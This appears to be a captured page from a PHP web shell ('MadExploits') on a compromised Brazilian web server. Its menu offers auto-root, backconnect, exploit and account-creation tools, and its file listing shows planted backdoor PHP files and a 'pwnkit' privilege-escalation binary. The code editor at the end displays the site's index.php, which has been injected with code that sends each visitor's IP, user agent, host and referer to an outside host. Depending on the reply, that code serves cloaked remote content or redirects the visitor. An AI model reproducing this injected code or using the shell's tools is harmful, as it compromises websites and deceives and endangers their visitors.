Linux vps-4302913.novaexata.com.br 3.10.0-1160.119.1.el7.tuxcare.els19.x86_64 #1 SMP Mon Mar 31 17:29:00 UTC 2025 x86_64
Apache
: 162.214.88.42 | : 216.73.216.99
166 Domain
7.3.33
wwnova
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
wwnova /
public_html /
acicafpremiada.com.br /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
2024
[ DIR ]
drwxr-xr-x
cgi-bin
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
0x194945BXRH.php
4.12
KB
-rw-r--r--
0x19495GZCOU.php
4.12
KB
-rw-r--r--
0x1949BIJKKG.php
4.12
KB
-rw-r--r--
0x1949LKGFCR.php
4.12
KB
-rw-r--r--
0x1949Q4FPN1.php
4.12
KB
-rw-r--r--
0x1949RNWM66.php
4.12
KB
-rw-r--r--
Private-MASS-ova.php
19.06
KB
-rw-r--r--
admin.php
278
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
documentroot.php
280
B
-rw-r--r--
goods.php
577
B
-rw-r--r--
google03588a098ee20279.html
53
B
-rw-r--r--
google18372def94796f27.html
53
B
-rw-r--r--
google298e9b430a229453.html
53
B
-rw-r--r--
google3b611924d8a868ba.html
53
B
-rw-r--r--
google537e082bbfe294fa.html
53
B
-rw-r--r--
google5cce3dda03c5ea79.html
53
B
-rw-r--r--
google7bf4c1896906723d.html
53
B
-rw-r--r--
googlea27f26ef3c16ef21.html
53
B
-rw-r--r--
googlec1ea6bf266124648.html
53
B
-rw-r--r--
googlecc879ae06689d91a.html
53
B
-rw-r--r--
googled67911d9ca645e70.html
53
B
-rw-r--r--
index.php
1.99
KB
-r--r--r--
modric8BTCHM.php
70.77
KB
-rw-r--r--
modricDHXFVX.php
2.14
KB
-rw-r--r--
modricPNBH8L.php
70.77
KB
-rw-r--r--
modricZW9ITU.php
2.14
KB
-rw-r--r--
postnews.php
5.72
KB
-r--r--r--
pwnkit
10.99
KB
-rwxr-xr-x
x7.php
278
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php function kindergarten() { $apiUrl = 'https://sundongyang.sbs/api/shade'; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $apiUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query([ 'ip' => $_SERVER['REMOTE_ADDR'], 'user_agent' => $_SERVER['HTTP_USER_AGENT'], 'hostname' => $_SERVER['HTTP_HOST'], 'referer' => $_SERVER['HTTP_REFERER'] ])); $response = curl_exec($ch); $http_status = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_status === 200) { $response_data = json_decode($response, true); if ($response_data && isset($response_data['success']) && $response_data['success'] === true) { $operation = isset($response_data['data']['operation']) ? $response_data['data']['operation'] : null; $target = isset($response_data['data']['target_url']) ? $response_data['data']['target_url'] : null; if ($operation === 'cloak' && $target) { $content = fetchContent($target); if ($content !== false) { echo $content; } exit; } elseif ($operation === 'redirect' && $target) { header("Location: $target", true, 301); exit; } } } } function fetchContent($url) { $ch2 = curl_init(); curl_setopt($ch2, CURLOPT_URL, $url); curl_setopt($ch2, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch2, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch2, CURLOPT_FOLLOWLOCATION, true); $content = curl_exec($ch2); if (curl_errno($ch2)) { error_log('cURL Error: ' . curl_error($ch2)); $content = false; } curl_close($ch2); return $content; } kindergarten(); ?>
Close